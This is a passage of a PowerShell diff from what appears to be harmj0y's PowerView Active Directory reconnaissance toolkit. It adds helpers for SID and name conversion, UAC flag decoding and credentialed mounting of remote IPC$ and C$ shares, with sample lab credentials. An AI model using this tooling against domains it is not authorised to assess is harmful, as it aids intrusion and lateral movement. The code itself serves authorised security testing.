$ObjectCSV | ForEach-Object { $CSVWriter.WriteLine($_) } + $Exists = $True + } + else { + # only output object field data + $ObjectCSV[1..($ObjectCSV.Length-1)] | ForEach-Object { $CSVWriter.WriteLine($_) } + } + } + } + + END { + $Mutex.ReleaseMutex() + $CSVWriter.Dispose() + $CSVStream.Dispose() + } +} + + +function Resolve-IPAddress { +<# +.SYNOPSIS + +Resolves a given hostename to its associated IPv4 address. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Resolves a given hostename to its associated IPv4 address using +[Net.Dns]::GetHostEntry(). If no hostname is provided, the default +is the IP address of the localhost. + +.EXAMPLE + +Resolve-IPAddress -ComputerName SERVER + +.EXAMPLE + +@("SERVER1", "SERVER2") | Resolve-IPAddress + +.INPUTS + +String + +Accepts one or more IP address strings on the pipeline. + +.OUTPUTS + +System.Management.Automation.PSCustomObject + +A custom PSObject with the ComputerName and IPAddress. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.Management.Automation.PSCustomObject')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = $Env:COMPUTERNAME + ) + + PROCESS { + ForEach ($Computer in $ComputerName) { + try { + @(([Net.Dns]::GetHostEntry($Computer)).AddressList) | ForEach-Object { + if ($_.AddressFamily -eq 'InterNetwork') { + $Out = New-Object PSObject + $Out | Add-Member Noteproperty 'ComputerName' $Computer + $Out | Add-Member Noteproperty 'IPAddress' $_.IPAddressToString + $Out + } + } + } + catch { + Write-Verbose "[Resolve-IPAddress] Could not resolve $Computer to an IP Address." + } + } + } +} + + +function ConvertTo-SID { +<# +.SYNOPSIS + +Converts a given user/group name to a security identifier (SID). + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Convert-ADName, Get-DomainObject, Get-Domain + +.DESCRIPTION + +Converts a "DOMAIN\username" syntax to a security identifier (SID) +using System.Security.Principal.NTAccount's translate function. If alternate +credentials are supplied, then Get-ADObject is used to try to map the name +to a security identifier. + +.PARAMETER ObjectName + +The user/group name to convert, can be 'user' or 'DOMAIN\user' format. + +.PARAMETER Domain + +Specifies the domain to use for the translation, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to for the translation. + +.PARAMETER Credential + +Specifies an alternate credential to use for the translation. + +.EXAMPLE + +ConvertTo-SID 'DEV\dfm' + +.EXAMPLE + +'DEV\dfm','DEV\krbtgt' | ConvertTo-SID + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +'TESTLAB\dfm' | ConvertTo-SID -Credential $Cred + +.INPUTS + +String + +Accepts one or more username specification strings on the pipeline. + +.OUTPUTS + +String + +A string representing the SID of the translated name. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([String])] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name', 'Identity')] + [String[]] + $ObjectName, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $DomainSearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $DomainSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $DomainSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $DomainSearcherArguments['Credential'] = $Credential } + } + + PROCESS { + ForEach ($Object in $ObjectName) { + $Object = $Object -Replace '/','\' + + if ($PSBoundParameters['Credential']) { + $DN = Convert-ADName -Identity $Object -OutputType 'DN' @DomainSearcherArguments + if ($DN) { + $UserDomain = $DN.SubString($DN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + $UserName = $DN.Split(',')[0].split('=')[1] + + $DomainSearcherArguments['Identity'] = $UserName + $DomainSearcherArguments['Domain'] = $UserDomain + $DomainSearcherArguments['Properties'] = 'objectsid' + Get-DomainObject @DomainSearcherArguments | Select-Object -Expand objectsid + } + } + else { + try { + if ($Object.Contains('\')) { + $Domain = $Object.Split('\')[0] + $Object = $Object.Split('\')[1] + } + elseif (-not $PSBoundParameters['Domain']) { + $DomainSearcherArguments = @{} + $Domain = (Get-Domain @DomainSearcherArguments).Name + } + + $Obj = (New-Object System.Security.Principal.NTAccount($Domain, $Object)) + $Obj.Translate([System.Security.Principal.SecurityIdentifier]).Value + } + catch { + Write-Verbose "[ConvertTo-SID] Error converting $Domain\$Object : $_" + } + } + } + } +} + + +function ConvertFrom-SID { +<# +.SYNOPSIS + +Converts a security identifier (SID) to a group/user name. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Convert-ADName + +.DESCRIPTION + +Converts a security identifier string (SID) to a group/user name +using Convert-ADName. + +.PARAMETER ObjectSid + +Specifies one or more SIDs to convert. + +.PARAMETER Domain + +Specifies the domain to use for the translation, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to for the translation. + +.PARAMETER Credential + +Specifies an alternate credential to use for the translation. + +.EXAMPLE + +ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 + +TESTLAB\harmj0y + +.EXAMPLE + +"S-1-5-21-890171859-3433809279-3366196753-1107", "S-1-5-21-890171859-3433809279-3366196753-1108", "S-1-5-32-562" | ConvertFrom-SID + +TESTLAB\WINDOWS2$ +TESTLAB\harmj0y +BUILTIN\Distributed COM Users + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) +ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 -Credential $Cred + +TESTLAB\harmj0y + +.INPUTS + +String + +Accepts one or more SID strings on the pipeline. + +.OUTPUTS + +String + +The converted DOMAIN\username. +#> + + [OutputType([String])] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('SID')] + [ValidatePattern('^S-1-.*')] + [String[]] + $ObjectSid, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $ADNameArguments = @{} + if ($PSBoundParameters['Domain']) { $ADNameArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential } + } + + PROCESS { + ForEach ($TargetSid in $ObjectSid) { + $TargetSid = $TargetSid.trim('*') + try { + # try to resolve any built-in SIDs first - https://support.microsoft.com/en-us/kb/243330 + Switch ($TargetSid) { + 'S-1-0' { 'Null Authority' } + 'S-1-0-0' { 'Nobody' } + 'S-1-1' { 'World Authority' } + 'S-1-1-0' { 'Everyone' } + 'S-1-2' { 'Local Authority' } + 'S-1-2-0' { 'Local' } + 'S-1-2-1' { 'Console Logon ' } + 'S-1-3' { 'Creator Authority' } + 'S-1-3-0' { 'Creator Owner' } + 'S-1-3-1' { 'Creator Group' } + 'S-1-3-2' { 'Creator Owner Server' } + 'S-1-3-3' { 'Creator Group Server' } + 'S-1-3-4' { 'Owner Rights' } + 'S-1-4' { 'Non-unique Authority' } + 'S-1-5' { 'NT Authority' } + 'S-1-5-1' { 'Dialup' } + 'S-1-5-2' { 'Network' } + 'S-1-5-3' { 'Batch' } + 'S-1-5-4' { 'Interactive' } + 'S-1-5-6' { 'Service' } + 'S-1-5-7' { 'Anonymous' } + 'S-1-5-8' { 'Proxy' } + 'S-1-5-9' { 'Enterprise Domain Controllers' } + 'S-1-5-10' { 'Principal Self' } + 'S-1-5-11' { 'Authenticated Users' } + 'S-1-5-12' { 'Restricted Code' } + 'S-1-5-13' { 'Terminal Server Users' } + 'S-1-5-14' { 'Remote Interactive Logon' } + 'S-1-5-15' { 'This Organization ' } + 'S-1-5-17' { 'This Organization ' } + 'S-1-5-18' { 'Local System' } + 'S-1-5-19' { 'NT Authority' } + 'S-1-5-20' { 'NT Authority' } + 'S-1-5-80-0' { 'All Services ' } + 'S-1-5-32-544' { 'BUILTIN\Administrators' } + 'S-1-5-32-545' { 'BUILTIN\Users' } + 'S-1-5-32-546' { 'BUILTIN\Guests' } + 'S-1-5-32-547' { 'BUILTIN\Power Users' } + 'S-1-5-32-548' { 'BUILTIN\Account Operators' } + 'S-1-5-32-549' { 'BUILTIN\Server Operators' } + 'S-1-5-32-550' { 'BUILTIN\Print Operators' } + 'S-1-5-32-551' { 'BUILTIN\Backup Operators' } + 'S-1-5-32-552' { 'BUILTIN\Replicators' } + 'S-1-5-32-554' { 'BUILTIN\Pre-Windows 2000 Compatible Access' } + 'S-1-5-32-555' { 'BUILTIN\Remote Desktop Users' } + 'S-1-5-32-556' { 'BUILTIN\Network Configuration Operators' } + 'S-1-5-32-557' { 'BUILTIN\Incoming Forest Trust Builders' } + 'S-1-5-32-558' { 'BUILTIN\Performance Monitor Users' } + 'S-1-5-32-559' { 'BUILTIN\Performance Log Users' } + 'S-1-5-32-560' { 'BUILTIN\Windows Authorization Access Group' } + 'S-1-5-32-561' { 'BUILTIN\Terminal Server License Servers' } + 'S-1-5-32-562' { 'BUILTIN\Distributed COM Users' } + 'S-1-5-32-569' { 'BUILTIN\Cryptographic Operators' } + 'S-1-5-32-573' { 'BUILTIN\Event Log Readers' } + 'S-1-5-32-574' { 'BUILTIN\Certificate Service DCOM Access' } + 'S-1-5-32-575' { 'BUILTIN\RDS Remote Access Servers' } + 'S-1-5-32-576' { 'BUILTIN\RDS Endpoint Servers' } + 'S-1-5-32-577' { 'BUILTIN\RDS Management Servers' } + 'S-1-5-32-578' { 'BUILTIN\Hyper-V Administrators' } + 'S-1-5-32-579' { 'BUILTIN\Access Control Assistance Operators' } + 'S-1-5-32-580' { 'BUILTIN\Access Control Assistance Operators' } + Default { + Convert-ADName -Identity $TargetSid @ADNameArguments + } + } + } + catch { + Write-Verbose "[ConvertFrom-SID] Error converting SID '$TargetSid' : $_" + } + } + } +} + + +function Convert-ADName { +<# +.SYNOPSIS + +Converts Active Directory object names between a variety of formats. + +Author: Bill Stewart, Pasquale Lantella +Modifications: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +This function is heavily based on Bill Stewart's code and Pasquale Lantella's code (in LINK) +and translates Active Directory names between various formats using the NameTranslate COM object. + +.PARAMETER Identity + +Specifies the Active Directory object name to translate, of the following form: + + DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com' + Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn' + NT4 domain\username; e.g., 'fabrikam\pflynn' + Display display name, e.g. 'pflynn' + DomainSimple simple domain name format, e.g. 'pflynn@fabrikam.com' + EnterpriseSimple simple enterprise name format, e.g. 'pflynn@fabrikam.com' + GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}' + UPN user principal name; e.g., 'pflynn@fabrikam.com' + CanonicalEx extended canonical name format + SPN service principal name format; e.g. 'HTTP/kairomac.contoso.com' + SID Security Identifier; e.g., 'S-1-5-21-12986231-600641547-709122288-57999' + +.PARAMETER OutputType + +Specifies the output name type you want to convert to, which must be one of the following: + + DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com' + Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn' + NT4 domain\username; e.g., 'fabrikam\pflynn' + Display display name, e.g. 'pflynn' + DomainSimple simple domain name format, e.g. 'pflynn@fabrikam.com' + EnterpriseSimple simple enterprise name format, e.g. 'pflynn@fabrikam.com' + GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}' + UPN user principal name; e.g., 'pflynn@fabrikam.com' + CanonicalEx extended canonical name format, e.g. 'fabrikam.com/Users/Phineas Flynn' + SPN service principal name format; e.g. 'HTTP/kairomac.contoso.com' + +.PARAMETER Domain + +Specifies the domain to use for the translation, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to for the translation. + +.PARAMETER Credential + +Specifies an alternate credential to use for the translation. + +.EXAMPLE + +Convert-ADName -Identity "TESTLAB\harmj0y" + +harmj0y@testlab.local + +.EXAMPLE + +"TESTLAB\krbtgt", "CN=Administrator,CN=Users,DC=testlab,DC=local" | Convert-ADName -OutputType Canonical + +testlab.local/Users/krbtgt +testlab.local/Users/Administrator + +.EXAMPLE + +Convert-ADName -OutputType dn -Identity 'TESTLAB\harmj0y' -Server PRIMARY.testlab.local + +CN=harmj0y,CN=Users,DC=testlab,DC=local + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) +'S-1-5-21-890171859-3433809279-3366196753-1108' | Convert-ADNAme -Credential $Cred + +TESTLAB\harmj0y + +.INPUTS + +String + +Accepts one or more objects name strings on the pipeline. + +.OUTPUTS + +String + +Outputs a string representing the converted name. + +.LINK + +http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats +https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67 +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [OutputType([String])] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name', 'ObjectName')] + [String[]] + $Identity, + + [String] + [ValidateSet('DN', 'Canonical', 'NT4', 'Display', 'DomainSimple', 'EnterpriseSimple', 'GUID', 'Unknown', 'UPN', 'CanonicalEx', 'SPN')] + $OutputType, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $NameTypes = @{ + 'DN' = 1 # CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com + 'Canonical' = 2 # fabrikam.com/Engineers/Phineas Flynn + 'NT4' = 3 # fabrikam\pflynn + 'Display' = 4 # pflynn + 'DomainSimple' = 5 # pflynn@fabrikam.com + 'EnterpriseSimple' = 6 # pflynn@fabrikam.com + 'GUID' = 7 # {95ee9fff-3436-11d1-b2b0-d15ae3ac8436} + 'Unknown' = 8 # unknown type - let the server do translation + 'UPN' = 9 # pflynn@fabrikam.com + 'CanonicalEx' = 10 # fabrikam.com/Users/Phineas Flynn + 'SPN' = 11 # HTTP/kairomac.contoso.com + 'SID' = 12 # S-1-5-21-12986231-600641547-709122288-57999 + } + + # accessor functions from Bill Stewart to simplify calls to NameTranslate + function Invoke-Method([__ComObject] $Object, [String] $Method, $Parameters) { + $Output = $Null + $Output = $Object.GetType().InvokeMember($Method, 'InvokeMethod', $NULL, $Object, $Parameters) + Write-Output $Output + } + + function Get-Property([__ComObject] $Object, [String] $Property) { + $Object.GetType().InvokeMember($Property, 'GetProperty', $NULL, $Object, $NULL) + } + + function Set-Property([__ComObject] $Object, [String] $Property, $Parameters) { + [Void] $Object.GetType().InvokeMember($Property, 'SetProperty', $NULL, $Object, $Parameters) + } + + # https://msdn.microsoft.com/en-us/library/aa772266%28v=vs.85%29.aspx + if ($PSBoundParameters['Server']) { + $ADSInitType = 2 + $InitName = $Server + } + elseif ($PSBoundParameters['Domain']) { + $ADSInitType = 1 + $InitName = $Domain + } + elseif ($PSBoundParameters['Credential']) { + $Cred = $Credential.GetNetworkCredential() + $ADSInitType = 1 + $InitName = $Cred.Domain + } + else { + # if no domain or server is specified, default to GC initialization + $ADSInitType = 3 + $InitName = $Null + } + } + + PROCESS { + ForEach ($TargetIdentity in $Identity) { + if (-not $PSBoundParameters['OutputType']) { + if ($TargetIdentity -match "^[A-Za-z]+\\[A-Za-z ]+") { + $ADSOutputType = $NameTypes['DomainSimple'] + } + else { + $ADSOutputType = $NameTypes['NT4'] + } + } + else { + $ADSOutputType = $NameTypes[$OutputType] + } + + $Translate = New-Object -ComObject NameTranslate + + if ($PSBoundParameters['Credential']) { + try { + $Cred = $Credential.GetNetworkCredential() + + Invoke-Method $Translate 'InitEx' ( + $ADSInitType, + $InitName, + $Cred.UserName, + $Cred.Domain, + $Cred.Password + ) + } + catch { + Write-Verbose "[Convert-ADName] Error initializing translation for '$Identity' using alternate credentials : $_" + } + } + else { + try { + $Null = Invoke-Method $Translate 'Init' ( + $ADSInitType, + $InitName + ) + } + catch { + Write-Verbose "[Convert-ADName] Error initializing translation for '$Identity' : $_" + } + } + + # always chase all referrals + Set-Property $Translate 'ChaseReferral' (0x60) + + try { + # 8 = Unknown name type -> let the server do the work for us + $Null = Invoke-Method $Translate 'Set' (8, $TargetIdentity) + Invoke-Method $Translate 'Get' ($ADSOutputType) + } + catch [System.Management.Automation.MethodInvocationException] { + Write-Verbose "[Convert-ADName] Error translating '$TargetIdentity' : $($_.Exception.InnerException.Message)" + } + } + } +} + + +function ConvertFrom-UACValue { +<# +.SYNOPSIS + +Converts a UAC int value to human readable form. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +This function will take an integer that represents a User Account +Control (UAC) binary blob and will covert it to an ordered +dictionary with each bitwise value broken out. By default only values +set are displayed- the -ShowAll switch will display all values with +a + next to the ones set. + +.PARAMETER Value + +Specifies the integer UAC value to convert. + +.PARAMETER ShowAll + +Switch. Signals ConvertFrom-UACValue to display all UAC values, with a + indicating the value is currently set. + +.EXAMPLE + +ConvertFrom-UACValue -Value 66176 + +Name Value +---- ----- +ENCRYPTED_TEXT_PWD_ALLOWED 128 +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 + +.EXAMPLE + +Get-DomainUser harmj0y | ConvertFrom-UACValue + +Name Value +---- ----- +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 + +.EXAMPLE + +Get-DomainUser harmj0y | ConvertFrom-UACValue -ShowAll + +Name Value +---- ----- +SCRIPT 1 +ACCOUNTDISABLE 2 +HOMEDIR_REQUIRED 8 +LOCKOUT 16 +PASSWD_NOTREQD 32 +PASSWD_CANT_CHANGE 64 +ENCRYPTED_TEXT_PWD_ALLOWED 128 +TEMP_DUPLICATE_ACCOUNT 256 +NORMAL_ACCOUNT 512+ +INTERDOMAIN_TRUST_ACCOUNT 2048 +WORKSTATION_TRUST_ACCOUNT 4096 +SERVER_TRUST_ACCOUNT 8192 +DONT_EXPIRE_PASSWORD 65536+ +MNS_LOGON_ACCOUNT 131072 +SMARTCARD_REQUIRED 262144 +TRUSTED_FOR_DELEGATION 524288 +NOT_DELEGATED 1048576 +USE_DES_KEY_ONLY 2097152 +DONT_REQ_PREAUTH 4194304 +PASSWORD_EXPIRED 8388608 +TRUSTED_TO_AUTH_FOR_DELEGATION 16777216 +PARTIAL_SECRETS_ACCOUNT 67108864 + +.INPUTS + +Int + +Accepts an integer representing a UAC binary blob. + +.OUTPUTS + +System.Collections.Specialized.OrderedDictionary + +An ordered dictionary with the converted UAC fields. + +.LINK + +https://support.microsoft.com/en-us/kb/305144 +#> + + [OutputType('System.Collections.Specialized.OrderedDictionary')] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('UAC', 'useraccountcontrol')] + [Int] + $Value, + + [Switch] + $ShowAll + ) + + BEGIN { + # values from https://support.microsoft.com/en-us/kb/305144 + $UACValues = New-Object System.Collections.Specialized.OrderedDictionary + $UACValues.Add("SCRIPT", 1) + $UACValues.Add("ACCOUNTDISABLE", 2) + $UACValues.Add("HOMEDIR_REQUIRED", 8) + $UACValues.Add("LOCKOUT", 16) + $UACValues.Add("PASSWD_NOTREQD", 32) + $UACValues.Add("PASSWD_CANT_CHANGE", 64) + $UACValues.Add("ENCRYPTED_TEXT_PWD_ALLOWED", 128) + $UACValues.Add("TEMP_DUPLICATE_ACCOUNT", 256) + $UACValues.Add("NORMAL_ACCOUNT", 512) + $UACValues.Add("INTERDOMAIN_TRUST_ACCOUNT", 2048) + $UACValues.Add("WORKSTATION_TRUST_ACCOUNT", 4096) + $UACValues.Add("SERVER_TRUST_ACCOUNT", 8192) + $UACValues.Add("DONT_EXPIRE_PASSWORD", 65536) + $UACValues.Add("MNS_LOGON_ACCOUNT", 131072) + $UACValues.Add("SMARTCARD_REQUIRED", 262144) + $UACValues.Add("TRUSTED_FOR_DELEGATION", 524288) + $UACValues.Add("NOT_DELEGATED", 1048576) + $UACValues.Add("USE_DES_KEY_ONLY", 2097152) + $UACValues.Add("DONT_REQ_PREAUTH", 4194304) + $UACValues.Add("PASSWORD_EXPIRED", 8388608) + $UACValues.Add("TRUSTED_TO_AUTH_FOR_DELEGATION", 16777216) + $UACValues.Add("PARTIAL_SECRETS_ACCOUNT", 67108864) + } + + PROCESS { + $ResultUACValues = New-Object System.Collections.Specialized.OrderedDictionary + + if ($ShowAll) { + ForEach ($UACValue in $UACValues.GetEnumerator()) { + if ( ($Value -band $UACValue.Value) -eq $UACValue.Value) { + $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)+") + } + else { + $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)") + } + } + } + else { + ForEach ($UACValue in $UACValues.GetEnumerator()) { + if ( ($Value -band $UACValue.Value) -eq $UACValue.Value) { + $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)") + } + } + } + $ResultUACValues + } +} + + +function Get-PrincipalContext { +<# +.SYNOPSIS + +Helper to take an Identity and return a DirectoryServices.AccountManagement.PrincipalContext +and simplified identity. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.PARAMETER Identity + +A group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202), +or a DOMAIN\username identity. + +.PARAMETER Domain + +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True)] + [Alias('GroupName', 'GroupIdentity')] + [String] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + Add-Type -AssemblyName System.DirectoryServices.AccountManagement + + try { + if ($PSBoundParameters['Domain'] -or ($Identity -match '.+\\.+')) { + if ($Identity -match '.+\\.+') { + # DOMAIN\groupname + $ConvertedIdentity = $Identity | Convert-ADName -OutputType Canonical + if ($ConvertedIdentity) { + $ConnectTarget = $ConvertedIdentity.SubString(0, $ConvertedIdentity.IndexOf('/')) + $ObjectIdentity = $Identity.Split('\')[1] + Write-Verbose "[Get-PrincipalContext] Binding to domain '$ConnectTarget'" + } + } + else { + $ObjectIdentity = $Identity + Write-Verbose "[Get-PrincipalContext] Binding to domain '$Domain'" + $ConnectTarget = $Domain + } + + if ($PSBoundParameters['Credential']) { + Write-Verbose '[Get-PrincipalContext] Using alternate credentials' + $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $ConnectTarget, $Credential.UserName, $Credential.GetNetworkCredential().Password) + } + else { + $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $ConnectTarget) + } + } + else { + if ($PSBoundParameters['Credential']) { + Write-Verbose '[Get-PrincipalContext] Using alternate credentials' + $DomainName = Get-Domain | Select-Object -ExpandProperty Name + $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $DomainName, $Credential.UserName, $Credential.GetNetworkCredential().Password) + } + else { + $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain) + } + $ObjectIdentity = $Identity + } + + $Out = New-Object PSObject + $Out | Add-Member Noteproperty 'Context' $Context + $Out | Add-Member Noteproperty 'Identity' $ObjectIdentity + $Out + } + catch { + Write-Warning "[Get-PrincipalContext] Error creating binding for object ('$Identity') context : $_" + } +} + + +function Add-RemoteConnection { +<# +.SYNOPSIS + +Pseudo "mounts" a connection to a remote path using the specified +credential object, allowing for access of remote resources. If a -Path isn't +specified, a -ComputerName is required to pseudo-mount IPC$. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +.DESCRIPTION + +This function uses WNetAddConnection2W to make a 'temporary' (i.e. not saved) connection +to the specified remote -Path (\\UNC\share) with the alternate credentials specified in the +-Credential object. If a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC$. + +To destroy the connection, use Remove-RemoteConnection with the same specified \\UNC\share path +or -ComputerName. + +.PARAMETER ComputerName + +Specifies the system to add a \\ComputerName\IPC$ connection for. + +.PARAMETER Path + +Specifies the remote \\UNC\path to add the connection for. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system. + +.EXAMPLE + +$Cred = Get-Credential +Add-RemoteConnection -ComputerName 'PRIMARY.testlab.local' -Credential $Cred + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Add-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\' -Credential $Cred + +.EXAMPLE + +$Cred = Get-Credential +@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Add-RemoteConnection -Credential $Cred +#> + + [CmdletBinding(DefaultParameterSetName = 'ComputerName')] + Param( + [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ComputerName', ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName, + + [Parameter(Position = 0, ParameterSetName = 'Path', Mandatory = $True)] + [ValidatePattern('\\\\.*\\.*')] + [String[]] + $Path, + + [Parameter(Mandatory = $True)] + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential + ) + + BEGIN { + $NetResourceInstance = [Activator]::CreateInstance($NETRESOURCEW) + $NetResourceInstance.dwType = 1 + } + + PROCESS { + $Paths = @() + if ($PSBoundParameters['ComputerName']) { + ForEach ($TargetComputerName in $ComputerName) { + $TargetComputerName = $TargetComputerName.Trim('\') + $Paths += ,"\\$TargetComputerName\IPC$" + } + } + else { + $Paths += ,$Path + } + + ForEach ($TargetPath in $Paths) { + $NetResourceInstance.lpRemoteName = $TargetPath + Write-Verbose "[Add-RemoteConnection] Attempting to mount: $TargetPath" + + # https://msdn.microsoft.com/en-us/library/windows/desktop/aa385413(v=vs.85).aspx + # CONNECT_TEMPORARY = 4 + $Result = $Mpr::WNetAddConnection2W($NetResourceInstance, $Credential.GetNetworkCredential().Password, $Credential.UserName, 4) + + if ($Result -eq 0) { + Write-Verbose "$TargetPath successfully mounted" + } + else { + Throw "[Add-RemoteConnection] error mounting $TargetPath : $(([ComponentModel.Win32Exception]$Result).Message)" + } + } + } +} + + +function Remove-RemoteConnection { +<# +.SYNOPSIS + +Destroys a connection created by New-RemoteConnection. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +.DESCRIPTION + +This function uses WNetCancelConnection2 to destroy a connection created by +New-RemoteConnection. If a -Path isn't specified, a -ComputerName is required to +'unmount' \\$ComputerName\IPC$. + +.PARAMETER ComputerName + +Specifies the system to remove a \\ComputerName\IPC$ connection for. + +.PARAMETER Path + +Specifies the remote \\UNC\path to remove the connection for. + +.EXAMPLE + +Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local' + +.EXAMPLE + +Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\' + +.EXAMPLE + +@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [CmdletBinding(DefaultParameterSetName = 'ComputerName')] + Param( + [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ComputerName', ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName, + + [Parameter(Position = 0, ParameterSetName = 'Path', Mandatory = $True)] + [ValidatePattern('\\\\.*\\.*')] + [String[]] + $Path + ) + + PROCESS { + $Paths = @() + if ($PSBoundParameters['ComputerName']) { + ForEach 